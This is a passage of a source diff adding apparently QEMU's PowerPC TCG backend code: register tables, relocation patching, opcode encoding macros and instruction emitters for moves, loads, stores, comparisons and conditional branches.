tcg_target_callee_save_regs[] = { +#ifdef TCG_TARGET_CALL_DARWIN + TCG_REG_R11, +#endif + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, /* currently used for the global env */ + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31 +}; + +static inline bool in_range_b(tcg_target_long target) +{ + return target == sextract64(target, 0, 26); +} + +static uint32_t reloc_pc24_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); + assert(in_range_b(disp)); + return disp & 0x3fffffc; +} + +static void reloc_pc24(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = (*pc & ~0x3fffffc) | reloc_pc24_val(pc, target); +} + +static uint16_t reloc_pc14_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); + assert(disp == (int16_t) disp); + return disp & 0xfffc; +} + +static void reloc_pc14(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = (*pc & ~0xfffc) | reloc_pc14_val(pc, target); +} + +static inline void tcg_out_b_noaddr(TCGContext *s, int insn) +{ + unsigned retrans = *s->code_ptr & 0x3fffffc; + tcg_out32(s, insn | retrans); +} + +static inline void tcg_out_bc_noaddr(TCGContext *s, int insn) +{ + unsigned retrans = *s->code_ptr & 0xfffc; + tcg_out32(s, insn | retrans); +} + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + tcg_insn_unit *target = (tcg_insn_unit *)value; + + assert(addend == 0); + switch (type) { + case R_PPC_REL14: + reloc_pc14(code_ptr, target); + break; + case R_PPC_REL24: + reloc_pc24(code_ptr, target); + break; + default: + tcg_abort(); + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch (ct_str[0]) { + case 'A': case 'B': case 'C': case 'D': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, 3 + ct_str[0] - 'A'); + break; + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + break; + case 'L': /* qemu_ld constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); +#ifdef CONFIG_SOFTMMU + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); +#endif + break; + case 'S': /* qemu_st constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); +#ifdef CONFIG_SOFTMMU + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R6); +#endif + break; + case 'I': + ct->ct |= TCG_CT_CONST_S16; + break; + case 'J': + ct->ct |= TCG_CT_CONST_U16; + break; + case 'M': + ct->ct |= TCG_CT_CONST_MONE; + break; + case 'T': + ct->ct |= TCG_CT_CONST_S32; + break; + case 'U': + ct->ct |= TCG_CT_CONST_U32; + break; + case 'Z': + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + if (ct & TCG_CT_CONST) { + return 1; + } + + /* The only 32-bit constraint we use aside from + TCG_CT_CONST is TCG_CT_CONST_S16. */ + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + + if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } else if ((ct & TCG_CT_CONST_MONE) && val == -1) { + return 1; + } + return 0; +} + +#define OPCD(opc) ((opc)<<26) +#define XO19(opc) (OPCD(19)|((opc)<<1)) +#define MD30(opc) (OPCD(30)|((opc)<<2)) +#define MDS30(opc) (OPCD(30)|((opc)<<1)) +#define XO31(opc) (OPCD(31)|((opc)<<1)) +#define XO58(opc) (OPCD(58)|(opc)) +#define XO62(opc) (OPCD(62)|(opc)) + +#define B OPCD( 18) +#define BC OPCD( 16) +#define LBZ OPCD( 34) +#define LHZ OPCD( 40) +#define LHA OPCD( 42) +#define LWZ OPCD( 32) +#define STB OPCD( 38) +#define STH OPCD( 44) +#define STW OPCD( 36) + +#define STD XO62( 0) +#define STDU XO62( 1) +#define STDX XO31(149) + +#define LD XO58( 0) +#define LDX XO31( 21) +#define LDU XO58( 1) +#define LWA XO58( 2) +#define LWAX XO31(341) + +#define ADDIC OPCD( 12) +#define ADDI OPCD( 14) +#define ADDIS OPCD( 15) +#define ORI OPCD( 24) +#define ORIS OPCD( 25) +#define XORI OPCD( 26) +#define XORIS OPCD( 27) +#define ANDI OPCD( 28) +#define ANDIS OPCD( 29) +#define MULLI OPCD( 7) +#define CMPLI OPCD( 10) +#define CMPI OPCD( 11) +#define SUBFIC OPCD( 8) + +#define LWZU OPCD( 33) +#define STWU OPCD( 37) + +#define RLWIMI OPCD( 20) +#define RLWINM OPCD( 21) +#define RLWNM OPCD( 23) + +#define RLDICL MD30( 0) +#define RLDICR MD30( 1) +#define RLDIMI MD30( 3) +#define RLDCL MDS30( 8) + +#define BCLR XO19( 16) +#define BCCTR XO19(528) +#define CRAND XO19(257) +#define CRANDC XO19(129) +#define CRNAND XO19(225) +#define CROR XO19(449) +#define CRNOR XO19( 33) + +#define EXTSB XO31(954) +#define EXTSH XO31(922) +#define EXTSW XO31(986) +#define ADD XO31(266) +#define ADDE XO31(138) +#define ADDME XO31(234) +#define ADDZE XO31(202) +#define ADDC XO31( 10) +#define AND XO31( 28) +#define SUBF XO31( 40) +#define SUBFC XO31( 8) +#define SUBFE XO31(136) +#define SUBFME XO31(232) +#define SUBFZE XO31(200) +#define OR XO31(444) +#define XOR XO31(316) +#define MULLW XO31(235) +#define MULHW XO31( 75) +#define MULHWU XO31( 11) +#define DIVW XO31(491) +#define DIVWU XO31(459) +#define CMP XO31( 0) +#define CMPL XO31( 32) +#define LHBRX XO31(790) +#define LWBRX XO31(534) +#define LDBRX XO31(532) +#define STHBRX XO31(918) +#define STWBRX XO31(662) +#define STDBRX XO31(660) +#define MFSPR XO31(339) +#define MTSPR XO31(467) +#define SRAWI XO31(824) +#define NEG XO31(104) +#define MFCR XO31( 19) +#define MFOCRF (MFCR | (1u << 20)) +#define NOR XO31(124) +#define CNTLZW XO31( 26) +#define CNTLZD XO31( 58) +#define ANDC XO31( 60) +#define ORC XO31(412) +#define EQV XO31(284) +#define NAND XO31(476) +#define ISEL XO31( 15) + +#define MULLD XO31(233) +#define MULHD XO31( 73) +#define MULHDU XO31( 9) +#define DIVD XO31(489) +#define DIVDU XO31(457) + +#define LBZX XO31( 87) +#define LHZX XO31(279) +#define LHAX XO31(343) +#define LWZX XO31( 23) +#define STBX XO31(215) +#define STHX XO31(407) +#define STWX XO31(151) + +#define SPR(a, b) ((((a)<<5)|(b))<<11) +#define LR SPR(8, 0) +#define CTR SPR(9, 0) + +#define SLW XO31( 24) +#define SRW XO31(536) +#define SRAW XO31(792) + +#define SLD XO31( 27) +#define SRD XO31(539) +#define SRAD XO31(794) +#define SRADI XO31(413<<1) + +#define TW XO31( 4) +#define TRAP (TW | TO(31)) + +#define NOP ORI /* ori 0,0,0 */ + +#define RT(r) ((r)<<21) +#define RS(r) ((r)<<21) +#define RA(r) ((r)<<16) +#define RB(r) ((r)<<11) +#define TO(t) ((t)<<21) +#define SH(s) ((s)<<11) +#define MB(b) ((b)<<6) +#define ME(e) ((e)<<1) +#define BO(o) ((o)<<21) +#define MB64(b) ((b)<<5) +#define FXM(b) (1 << (19 - (b))) + +#define LK 1 + +#define TAB(t, a, b) (RT(t) | RA(a) | RB(b)) +#define SAB(s, a, b) (RS(s) | RA(a) | RB(b)) +#define TAI(s, a, i) (RT(s) | RA(a) | ((i) & 0xffff)) +#define SAI(s, a, i) (RS(s) | RA(a) | ((i) & 0xffff)) + +#define BF(n) ((n)<<23) +#define BI(n, c) (((c)+((n)*4))<<16) +#define BT(n, c) (((c)+((n)*4))<<21) +#define BA(n, c) (((c)+((n)*4))<<16) +#define BB(n, c) (((c)+((n)*4))<<11) +#define BC_(n, c) (((c)+((n)*4))<<6) + +#define BO_COND_TRUE BO(12) +#define BO_COND_FALSE BO( 4) +#define BO_ALWAYS BO(20) + +enum { + CR_LT, + CR_GT, + CR_EQ, + CR_SO +}; + +static const uint32_t tcg_to_bc[] = { + [TCG_COND_EQ] = BC | BI(7, CR_EQ) | BO_COND_TRUE, + [TCG_COND_NE] = BC | BI(7, CR_EQ) | BO_COND_FALSE, + [TCG_COND_LT] = BC | BI(7, CR_LT) | BO_COND_TRUE, + [TCG_COND_GE] = BC | BI(7, CR_LT) | BO_COND_FALSE, + [TCG_COND_LE] = BC | BI(7, CR_GT) | BO_COND_FALSE, + [TCG_COND_GT] = BC | BI(7, CR_GT) | BO_COND_TRUE, + [TCG_COND_LTU] = BC | BI(7, CR_LT) | BO_COND_TRUE, + [TCG_COND_GEU] = BC | BI(7, CR_LT) | BO_COND_FALSE, + [TCG_COND_LEU] = BC | BI(7, CR_GT) | BO_COND_FALSE, + [TCG_COND_GTU] = BC | BI(7, CR_GT) | BO_COND_TRUE, +}; + +/* The low bit here is set if the RA and RB fields must be inverted. */ +static const uint32_t tcg_to_isel[] = { + [TCG_COND_EQ] = ISEL | BC_(7, CR_EQ), + [TCG_COND_NE] = ISEL | BC_(7, CR_EQ) | 1, + [TCG_COND_LT] = ISEL | BC_(7, CR_LT), + [TCG_COND_GE] = ISEL | BC_(7, CR_LT) | 1, + [TCG_COND_LE] = ISEL | BC_(7, CR_GT) | 1, + [TCG_COND_GT] = ISEL | BC_(7, CR_GT), + [TCG_COND_LTU] = ISEL | BC_(7, CR_LT), + [TCG_COND_GEU] = ISEL | BC_(7, CR_LT) | 1, + [TCG_COND_LEU] = ISEL | BC_(7, CR_GT) | 1, + [TCG_COND_GTU] = ISEL | BC_(7, CR_GT), +}; + +static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt, + TCGReg base, tcg_target_long offset); + +static void tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) +{ + tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + if (ret != arg) { + tcg_out32(s, OR | SAB(arg, ret, arg)); + } +} + +static inline void tcg_out_rld(TCGContext *s, int op, TCGReg ra, TCGReg rs, + int sh, int mb) +{ + assert(TCG_TARGET_REG_BITS == 64); + sh = SH(sh & 0x1f) | (((sh >> 5) & 1) << 1); + mb = MB64((mb >> 5) | ((mb << 1) & 0x3f)); + tcg_out32(s, op | RA(ra) | RS(rs) | sh | mb); +} + +static inline void tcg_out_rlw(TCGContext *s, int op, TCGReg ra, TCGReg rs, + int sh, int mb, int me) +{ + tcg_out32(s, op | RA(ra) | RS(rs) | SH(sh) | MB(mb) | ME(me)); +} + +static inline void tcg_out_ext32u(TCGContext *s, TCGReg dst, TCGReg src) +{ + tcg_out_rld(s, RLDICL, dst, src, 0, 32); +} + +static inline void tcg_out_shli32(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rlw(s, RLWINM, dst, src, c, 0, 31 - c); +} + +static inline void tcg_out_shli64(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rld(s, RLDICR, dst, src, c, 63 - c); +} + +static inline void tcg_out_shri32(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rlw(s, RLWINM, dst, src, 32 - c, c, 31); +} + +static inline void tcg_out_shri64(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rld(s, RLDICL, dst, src, 64 - c, c); +} + +static void tcg_out_movi32(TCGContext *s, TCGReg ret, int32_t arg) +{ + if (arg == (int16_t) arg) { + tcg_out32(s, ADDI | TAI(ret, 0, arg)); + } else { + tcg_out32(s, ADDIS | TAI(ret, 0, arg >> 16)); + if (arg & 0xffff) { + tcg_out32(s, ORI | SAI(ret, ret, arg)); + } + } +} + +static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, + tcg_target_long arg) +{ + tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + if (type == TCG_TYPE_I32 || arg == (int32_t)arg) { + tcg_out_movi32(s, ret, arg); + } else if (arg == (uint32_t)arg && !(arg & 0x8000)) { + tcg_out32(s, ADDI | TAI(ret, 0, arg)); + tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16)); + } else { + int32_t high; + + if (USE_REG_RA) { + intptr_t diff = arg - (intptr_t)tb_ret_addr; + if (diff == (int32_t)diff) { + tcg_out_mem_long(s, ADDI, ADD, ret, TCG_REG_RA, diff); + return; + } + } + + high = arg >> 31 >> 1; + tcg_out_movi32(s, ret, high); + if (high) { + tcg_out_shli64(s, ret, ret, 32); + } + if (arg & 0xffff0000) { + tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16)); + } + if (arg & 0xffff) { + tcg_out32(s, ORI | SAI(ret, ret, arg)); + } + } +} + +static bool mask_operand(uint32_t c, int *mb, int *me) +{ + uint32_t lsb, test; + + /* Accept a bit pattern like: + 0....01....1 + 1....10....0 + 0..01..10..0 + Keep track of the transitions. */ + if (c == 0 || c == -1) { + return false; + } + test = c; + lsb = test & -test; + test += lsb; + if (test & (test - 1)) { + return false; + } + + *me = clz32(lsb); + *mb = test ? clz32(test & -test) + 1 : 0; + return true; +} + +static bool mask64_operand(uint64_t c, int *mb, int *me) +{ + uint64_t lsb; + + if (c == 0) { + return false; + } + + lsb = c & -c; + /* Accept 1..10..0. */ + if (c == -lsb) { + *mb = 0; + *me = clz64(lsb); + return true; + } + /* Accept 0..01..1. */ + if (lsb == 1 && (c & (c + 1)) == 0) { + *mb = clz64(c + 1) + 1; + *me = 63; + return true; + } + return false; +} + +static void tcg_out_andi32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) +{ + int mb, me; + + if ((c & 0xffff) == c) { + tcg_out32(s, ANDI | SAI(src, dst, c)); + return; + } else if ((c & 0xffff0000) == c) { + tcg_out32(s, ANDIS | SAI(src, dst, c >> 16)); + return; + } else if (mask_operand(c, &mb, &me)) { + tcg_out_rlw(s, RLWINM, dst, src, 0, mb, me); + } else { + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R0, c); + tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0)); + } +} + +static void tcg_out_andi64(TCGContext *s, TCGReg dst, TCGReg src, uint64_t c) +{ + int mb, me; + + assert(TCG_TARGET_REG_BITS == 64); + if ((c & 0xffff) == c) { + tcg_out32(s, ANDI | SAI(src, dst, c)); + return; + } else if ((c & 0xffff0000) == c) { + tcg_out32(s, ANDIS | SAI(src, dst, c >> 16)); + return; + } else if (mask64_operand(c, &mb, &me)) { + if (mb == 0) { + tcg_out_rld(s, RLDICR, dst, src, 0, me); + } else { + tcg_out_rld(s, RLDICL, dst, src, 0, mb); + } + } else { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, c); + tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0)); + } +} + +static void tcg_out_zori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c, + int op_lo, int op_hi) +{ + if (c >> 16) { + tcg_out32(s, op_hi | SAI(src, dst, c >> 16)); + src = dst; + } + if (c & 0xffff) { + tcg_out32(s, op_lo | SAI(src, dst, c)); + src = dst; + } +} + +static void tcg_out_ori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) +{ + tcg_out_zori32(s, dst, src, c, ORI, ORIS); +} + +static void tcg_out_xori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) +{ + tcg_out_zori32(s, dst, src, c, XORI, XORIS); +} + +static void tcg_out_b(TCGContext *s, int mask, tcg_insn_unit *target) +{ + ptrdiff_t disp = tcg_pcrel_diff(s, target); + if (in_range_b(disp)) { + tcg_out32(s, B | (disp & 0x3fffffc) | mask); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, (uintptr_t)target); + tcg_out32(s, MTSPR | RS(TCG_REG_R0) | CTR); + tcg_out32(s, BCCTR | BO_ALWAYS | mask); + } +} + +static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt, + TCGReg base, tcg_target_long offset) +{ + tcg_target_long orig = offset, l0, l1, extra = 0, align = 0; + bool is_store = false; + TCGReg rs = TCG_REG_TMP1; + + switch (opi) { + case LD: case LWA: + align = 3; + /* FALLTHRU */ + default: + if (rt != TCG_REG_R0) { + rs = rt; + break; + } + break; + case STD: + align = 3; + /* FALLTHRU */ + case STB: case STH: case STW: + is_store = true; + break; + } + + /* For unaligned, or very large offsets, use the indexed form. */ + if (offset & align || offset != (int32_t)offset) { + if (rs == base) { + rs = TCG_REG_R0; + } + tcg_debug_assert(!is_store || rs != rt); + tcg_out_movi(s, TCG_TYPE_PTR, rs, orig); + tcg_out32(s, opx | TAB(rt, base, rs)); + return; + } + + l0 = (int16_t)offset; + offset = (offset - l0) >> 16; + l1 = (int16_t)offset; + + if (l1 < 0 && orig >= 0) { + extra = 0x4000; + l1 = (int16_t)(offset - 0x4000); + } + if (l1) { + tcg_out32(s, ADDIS | TAI(rs, base, l1)); + base = rs; + } + if (extra) { + tcg_out32(s, ADDIS | TAI(rs, base, extra)); + base = rs; + } + if (opi != ADDI || base != rt || l0 != 0) { + tcg_out32(s, opi | TAI(rt, base, l0)); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, + TCGReg arg1, intptr_t arg2) +{ + int opi, opx; + + assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + if (type == TCG_TYPE_I32) { + opi = LWZ, opx = LWZX; + } else { + opi = LD, opx = LDX; + } + tcg_out_mem_long(s, opi, opx, ret, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + int opi, opx; + + assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + if (type == TCG_TYPE_I32) { + opi = STW, opx = STWX; + } else { + opi = STD, opx = STDX; + } + tcg_out_mem_long(s, opi, opx, arg, arg1, arg2); +} + +static void tcg_out_cmp(TCGContext *s, int cond, TCGArg arg1, TCGArg arg2, + int const_arg2, int cr, TCGType type) +{ + int imm; + uint32_t op; + + tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + + /* Simplify the comparisons below wrt CMPI. */ + if (type == TCG_TYPE_I32) { + arg2 = (int32_t)arg2; + } + + switch (cond) { + case TCG_COND_EQ: + case TCG_COND_NE: + if (const_arg2) { + if ((int16_t) arg2 == arg2) { + op = CMPI; + imm = 1; + break; + } else if ((uint16_t) arg2 == arg2) { + op = CMPLI; + imm = 1; + break; + } + } + op = CMPL; + imm = 0; + break; + + case TCG_COND_LT: + case TCG_COND_GE: + case TCG_COND_LE: + case TCG_COND_GT: + if (const_arg2) { + if ((int16_t) arg2 == arg2) { + op = CMPI; + imm = 1; + break; + } + } + op = CMP; + imm = 0; + break; + + case TCG_COND_LTU: + case TCG_COND_GEU: + case TCG_COND_LEU: + case TCG_COND_GTU: + if (const_arg2) { + if ((uint16_t) arg2 == arg2) { + op = CMPLI; + imm = 1; + break; + } + } + op = CMPL; + imm = 0; + break; + + default: + tcg_abort(); + } + op |= BF(cr) | ((type == TCG_TYPE_I64) << 21); + + if (imm) { + tcg_out32(s, op | RA(arg1) | (arg2 & 0xffff)); + } else { + if (const_arg2) { + tcg_out_movi(s, type, TCG_REG_R0, arg2); + arg2 = TCG_REG_R0; + } + tcg_out32(s, op | RA(arg1) | RB(arg2)); + } +} + +static void tcg_out_setcond_eq0(TCGContext *s, TCGType type, + TCGReg dst, TCGReg src) +{ + if (type == TCG_TYPE_I32) { + tcg_out32(s, CNTLZW | RS(src) | RA(dst)); + tcg_out_shri32(s, dst, dst, 5); + } else { + tcg_out32(s, CNTLZD | RS(src) | RA(dst)); + tcg_out_shri64(s, dst, dst, 6); + } +} + +static void tcg_out_setcond_ne0(TCGContext *s, TCGReg dst, TCGReg src) +{ + /* X != 0 implies X + -1 generates a carry. Extra addition + trickery means: R = X-1 + ~X + C = X-1 + (-X+1) + C = C. */ + if (dst != src) { + tcg_out32(s, ADDIC | TAI(dst, src, -1)); + tcg_out32(s, SUBFE | TAB(dst, dst, src)); + } else { + tcg_out32(s, ADDIC | TAI(TCG_REG_R0, src, -1)); + tcg_out32(s, SUBFE | TAB(dst, TCG_REG_R0, src)); + } +} + +static TCGReg tcg_gen_setcond_xor(TCGContext *s, TCGReg arg1, TCGArg arg2, + bool const_arg2) +{ + if (const_arg2) { + if ((uint32_t)arg2 == arg2) { + tcg_out_xori32(s, TCG_REG_R0, arg1, arg2); + } else { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, arg2); + tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, TCG_REG_R0)); + } + } else { + tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, arg2)); + } + return TCG_REG_R0; +} + +static void tcg_out_setcond(TCGContext *s, TCGType type, TCGCond cond, + TCGArg arg0, TCGArg arg1, TCGArg arg2, + int const_arg2) +{ + int crop, sh; + + assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + + /* Ignore high bits of a potential constant arg2. */ + if (type == TCG_TYPE_I32) { + arg2 = (uint32_t)arg2; + } + + /* Handle common and trivial cases before handling anything else. */ + if (arg2 == 0) { + switch (cond) { + case TCG_COND_EQ: + tcg_out_setcond_eq0(s, type, arg0, arg1); + return; + case TCG_COND_NE: + if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { + tcg_out_ext32u(s, TCG_REG_R0, arg1); + arg1 = TCG_REG_R0; + } + tcg_out_setcond_ne0(s, arg0, arg1); + return; + case TCG_COND_GE: + tcg_out32(s, NOR | SAB(arg1, arg0, arg1)); + arg1 = arg0; + /* FALLTHRU */ + case TCG_COND_LT: + /* Extract the sign bit. */ + if (type == TCG_TYPE_I32) { + tcg_out_shri32(s, arg0, arg1, 31); + } else { + tcg_out_shri64(s, arg0, arg1, 63); + } + return; + default: + break; + } + } + + /* If we have ISEL, we can implement everything with 3 or 4 insns. + All other cases below are also at least 3 insns, so speed up the + code generator by not considering them and always using ISEL. */ + if (HAVE_ISEL) { + int isel, tab; + + tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); + + isel = tcg_to_isel[cond]; + + tcg_out_movi(s, type, arg0, 1); + if (isel & 1) { + /* arg0 = (bc ? 0 : 1) */ + tab = TAB(arg0, 0, arg0); + isel &= ~1; + } else { + /* arg0 = (bc ? 1 : 0) */ + tcg_out_movi(s, type, TCG_REG_R0, 0); + tab = TAB(arg0, arg0, TCG_REG_R0); + } + tcg_out32(s, isel | tab); + return; + } + + switch (cond) { + case TCG_COND_EQ: + arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2); + tcg_out_setcond_eq0(s, type, arg0, arg1); + return; + + case TCG_COND_NE: + arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2); + /* Discard the high bits only once, rather than both inputs. */ + if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { + tcg_out_ext32u(s, TCG_REG_R0, arg1); + arg1 = TCG_REG_R0; + } + tcg_out_setcond_ne0(s, arg0, arg1); + return; + + case TCG_COND_GT: + case TCG_COND_GTU: + sh = 30; + crop = 0; + goto crtest; + + case TCG_COND_LT: + case TCG_COND_LTU: + sh = 29; + crop = 0; + goto crtest; + + case TCG_COND_GE: + case TCG_COND_GEU: + sh = 31; + crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_LT) | BB(7, CR_LT); + goto crtest; + + case TCG_COND_LE: + case TCG_COND_LEU: + sh = 31; + crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_GT) | BB(7, CR_GT); + crtest: + tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); + if (crop) { + tcg_out32(s, crop); + } + tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7)); + tcg_out_rlw(s, RLWINM, arg0, TCG_REG_R0, sh, 31, 31); + break; + + default: + tcg_abort(); + } +} + +static void tcg_out_bc(TCGContext *s, int bc, int label_index) +{ + TCGLabel *l = &s->labels[label_index]; + + if (l->has_value) { + tcg_out32(s, bc | reloc_pc14_val(s->code_ptr, l->u.value_ptr)); + } else { + tcg_out_reloc(s, s->code_ptr, R_PPC_REL14, label_index, 0); + tcg_out_bc_noaddr(s, bc); + } +} + +static void tcg_out_brcond(TCGContext *s, TCGCond cond, + TCGArg arg1, TCGArg arg2, int const_arg2, + int label_index, TCGType type) +{ + tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); + tcg_out_bc(s, tcg_to_bc[cond], label_index); +} + +static void tcg_out_movcond(TCGContext *s, TCGType type, TCGCond cond, + TCGArg dest, TCGArg c1, TCGArg c2, TCGArg v1, + TCGArg v2, bool const_c2) +{ + /* If for some reason both inputs are zero, don't produce bad code. */ + if (v1 == 0 && v2 == 0) { + tcg_out_movi(s, type, dest, 0); + return; + } + + tcg_out_cmp(s, cond, c1, c2, const_c2, 7, type); + + if (HAVE_ISEL) { + int isel = tcg_to_isel[cond]; + + /* Swap the V operands if the operation indicates inversion. */ + if (isel & 1) { + int t = v1; + v1 = v2; + v2 = t; + isel &= ~1; + } + /* V1 == 0 is handled by isel; V2 == 0 must be handled by hand. */ + if (v2 == 0) { + tcg_out_movi(s, type, TCG_REG_R0, 0); + } + tcg_out32(s, isel | TAB(dest, v1, v2)); + } else { + if (dest == v2) { + cond = tcg_invert_cond(cond); + v2 = v1; + } else if (dest != v1) { + if (v1 == 0) { + tcg_out_movi(s, type, dest, 0); + } else { + tcg_out_mov(s, type, dest, v1); + } + } + /* Branch forward over one insn */ + tcg_out32(s, tcg_to_bc[cond] | 8); + if (v2 == 0) { + tcg_out_movi(s, type, dest, 0); + } else { + tcg_out_mov(s, type, dest, v2); + } + } +} + +static void tcg_out_cmp2(TCGContext *s, const TCGArg *args, + const int *const_args) +{ + static const struct { uint8_t bit1, bit2; } bits[] = { + [TCG_COND_LT ] = { CR_LT, CR_LT }, + [TCG_COND_LE ] = { CR_LT, CR_GT }, + [TCG_COND_GT ] = { CR_GT, CR_GT }, + [TCG_COND_GE ] = { CR_GT, CR_LT }, + [TCG_COND_LTU] = { CR_LT, CR_LT }, + [TCG_COND_LEU] = { CR_LT, CR_GT }, + [TCG_COND_GTU] = { CR_GT, CR_GT }, + [TCG_COND_GEU] = { CR_GT, CR_LT }, + }; + + TCGCond cond = args[4], cond2; + TCGArg al, ah, bl, bh; + int blconst, bhconst; + int op, bit1, bit2; + + al = args[0]; + ah = args[1]; + bl = args[2]; + bh = args[3]; + blconst = const_args[2]; + bhconst = const_args[3]; + + switch (cond) { + case TCG_COND_EQ: + op = CRAND; + goto do_equality; + case TCG_COND_NE: + op = CRNAND; + do_equality: + tcg_out_cmp(s, cond, al, bl, blconst, 6, TCG_TYPE_I32); + tcg_out_cmp(s, cond, ah, bh, bhconst, 7, TCG_TYPE_I32); + tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ)); + break; + + case TCG_COND_LT: + case TCG_COND_LE: + case TCG_COND_GT: + case TCG_COND_GE: + case TCG_COND_LTU: + case TCG_COND_LEU: + case TCG_COND_GTU: + case TCG_COND_GEU: + bit1 = bits[cond].bit1; + bit2 = bits[cond].bit2; + op = (bit1 != bit2 ? CRANDC : CRAND); + cond2 = tcg_unsigned_cond(cond); + + tcg_out_cmp(s, cond, ah, bh, bhconst, 6, TCG_TYPE_I32); + tcg_out_cmp(s, cond2, al, bl, blconst, 7, TCG_TYPE_I32); + tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, bit2)); + tcg_out32(s, CROR | BT(7, CR_EQ) | BA(6, bit1) | BB(7, CR_EQ)); + break; + + default: + tcg_abort(); + } +} + +static void tcg_out_setcond2(TCGContext *s, const TCGArg *args, + const int *const_args) +{ + tcg_out_cmp2(s, args + 1, const_args + 1); + tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7)); + tcg_out_rlw(s, RLWINM, args[0], TCG_REG_R0, 31, 31, 31); +} + +static void tcg_out_brcond2 (TCGContext *s, const TCGArg *args, + const int *const_args) +{ + tcg_out_cmp2(s, args, const_args); + tcg_out_bc(s, BC | BI(7, CR_EQ) | BO_COND_TRUE, args[5]); +} + +void ppc_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr) +{ + TCGContext s; + + s.code_buf = s.code_ptr = (tcg_insn_unit *)jmp_addr; + tcg_out_b(&s, 0, (tcg_insn_unit *)addr); + flush_icache_range(jmp_addr, jmp_addr + tcg_current_code_size(&s)); +} + +static void 